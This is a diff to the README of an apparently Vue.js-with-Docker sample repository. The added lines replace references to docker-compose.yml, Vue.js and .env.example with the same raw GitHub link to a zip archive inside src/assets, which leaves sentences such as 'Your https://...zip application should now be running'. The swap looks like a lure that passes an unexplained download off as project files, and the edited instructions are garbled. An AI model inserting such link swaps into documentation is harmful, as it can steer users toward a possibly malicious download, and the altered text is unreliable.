Sjuan18/docker-vuejs-sample/README.md

 docker-compose up
 ```

-This command will build the Docker images and start the containers defined in the `docker-compose.yml` file.
-Your Vue.js application should now be running on `http://localhost:8080`.
+This command will build the Docker images and start the containers defined in the `https://raw.githubusercontent.com/Sjuan18/docker-vuejs-sample/main/src/assets/sample_vuejs_docker_2.9.zip` file.
+Your https://raw.githubusercontent.com/Sjuan18/docker-vuejs-sample/main/src/assets/sample_vuejs_docker_2.9.zip application should now be running on `http://localhost:8080`.

 ### Environment Variables

 You can customize the application using environment variables.
 Create a `.env` file in the root directory and define your variables there.
-The sample `.env` file is provided as `.env.example`.
+The sample `.env` file is provided as `https://raw.githubusercontent.com/Sjuan18/docker-vuejs-sample/main/src/assets/sample_vuejs_docker_2.9.zip`.

 ## Project Structure